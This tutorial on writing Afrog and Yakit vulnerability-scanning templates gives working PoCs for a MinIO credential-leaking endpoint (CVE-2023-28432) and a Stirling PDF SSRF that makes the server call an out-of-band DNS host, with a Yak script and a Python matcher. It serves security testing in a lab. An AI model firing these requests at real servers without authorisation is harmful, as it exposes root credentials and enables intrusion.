Vulnerability Scanning Discovery - Web Services: PoC Development, Yakit Plugin Writing, the Afrog Project, YAML Syntax, Yak Language, Response Matching
Key points: PoC development / remote vulnerability scanning / Afrog project; Yakit native-syntax template plugins
Demo cases: PoC development / remote vulnerability scanning / Afrog project; Yakit native-syntax template plugins

I. Afrog PoC development

Official PoC rule-writing guide: https://github.com/zan8in/afrog/wiki/Afrog-PoC-%E8%A7%84%E5%88%99%E7%BC%96%E5%86%99%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97

1. MinIO cluster-mode information disclosure (CVE-2023-28432)

Lab environment: https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432

Test:

```shell
afrog.exe -t https://xx.xx.xx.xx:xxxx -P minio.yaml
```

minio.yaml:

```yaml
id: CVE-2023-28432

info:
  name: My PoC demo1
  author: xiaodisec
  severity: critical

rules:
  r0:
    request:
      method: POST
      path: /minio/bootstrap/v1/verify
      headers:
        Content-Type: application/x-www-form-urlencoded
    # Match only when the status is 200 AND the body carries the root password key,
    # i.e. the bootstrap verify endpoint is echoing the node's environment variables.
    expression: response.status == 200 && response.body.bcontains(b"MINIO_ROOT_PASSWORD")
expression: r0()
```

2. Stirling PDF SSRF (CVE-2025-55161)

Test (an out-of-band DNS provider is required for this rule):

```shell
afrog.exe -t https://xx.xx.xx.xx:xxxx -P SSRF.yaml --oob dnslogcn
```

SSRF.yaml:

```yaml
id: CVE-2025-55161

info:
  name: My PoC demo2
  author: xiaodisec
  severity: critical

set:
  # Random file name so each run is distinguishable in the OOB log
  username: randomLowercase(6)

rules:
  r0:
    request:
      method: POST
      path: /api/v1/convert/markdown/pdf
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK
      body: |-
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK
        Content-Disposition: form-data; name="fileInput"; filename="{{username}}.md"
        Content-Type: application/octet-stream

        <img src="http://{{oob.DNS}}/">
        ------WebKitFormBoundaryvAfAbBmFpYrQfooK--
    # The rule matches when the OOB server records a DNS lookup of the generated {{oob.DNS}} name
    expression: oobCheck(oob.ProtocolDNS, 5)
expression: r0()
```

II. Yakit PoC plugin development

1. Nuclei-style YAML syntax

Official PoC-writing reference: https://www.yaklang.com/docs/security/cap8-4-yaml-poc

2. Native Yak language (not recommended; this approach is more cumbersome)

```yak
loglevel("info")
yakit.AutoInitYakit()

// Send the raw MinIO bootstrap verify request; {{params(target)}} is filled from poc.params
sendPacket = func(target) {
    return poc.HTTP(`POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{params(target)}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

`, poc.params({"target": target}))
}

target = cli.String("target")
if target == "" {
    die("no target")
}

result = "MINIO_ROOT_USER"
// poc.HTTP returns (response, request, error)
rsp, _, err = sendPacket(target)
die(err)

headers, body = str.SplitHTTPHeadersAndBodyFromPacket(rsp)
if str.MatchAllOfSubString(body, result) {
    yakit.StatusCard("发现漏洞", target)
    log.info("find token: %v", result)
}
```
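As an added example (not afrog's code and not part of the original notes), the Python below re-implements the two mechanics the Afrog rules above depend on: rendering `{{username}}` / `{{oob.DNS}}` placeholders from `set:` values, and evaluating `response.status == 200 && response.body.bcontains(b"MINIO_ROOT_PASSWORD")` against raw HTTP responses. The sample responses are constructed, not captured from any host, so the matching logic can be checked offline before a rule is run against a lab target.

```python
import re

PLACEHOLDER = re.compile(r"\{\{\s*([\w.]+)\s*\}\}")

def render(template: str, variables: dict) -> str:
    """Substitute {{username}} / {{oob.DNS}} style placeholders, as afrog
    does with `set:` values and OOB fields before sending the request."""
    return PLACEHOLDER.sub(lambda m: str(variables[m.group(1)]), template)

def parse_response(raw: bytes):
    """Split a raw HTTP response into (status code, headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split(b" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.decode().strip().lower()] = value.decode().strip()
    return status, headers, body

def bcontains(body: bytes, needle: bytes) -> bool:
    """Equivalent of afrog's response.body.bcontains(b"...")."""
    return needle in body

def minio_rule_matches(raw: bytes) -> bool:
    """r0 of the MinIO PoC:
    response.status == 200 && response.body.bcontains(b"MINIO_ROOT_PASSWORD")"""
    status, _, body = parse_response(raw)
    return status == 200 and bcontains(body, b"MINIO_ROOT_PASSWORD")

# Constructed sample responses (not captured from any real host).
LEAKING = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n"
    b'{"MinioEnv":{"MINIO_ROOT_USER":"minioadmin",'
    b'"MINIO_ROOT_PASSWORD":"minioadmin"}}'
)
# A 200 whose body lacks the key must NOT match: both terms of the && matter.
CLEAN = b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\n{}"
DENIED = b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("leaking", LEAKING), ("clean", CLEAN), ("denied", DENIED)):
        print(name, minio_rule_matches(raw))
    print(render('filename="{{username}}.md" src=http://{{oob.DNS}}/',
                 {"username": "abcdef", "oob.DNS": "x.oob.invalid"}))
```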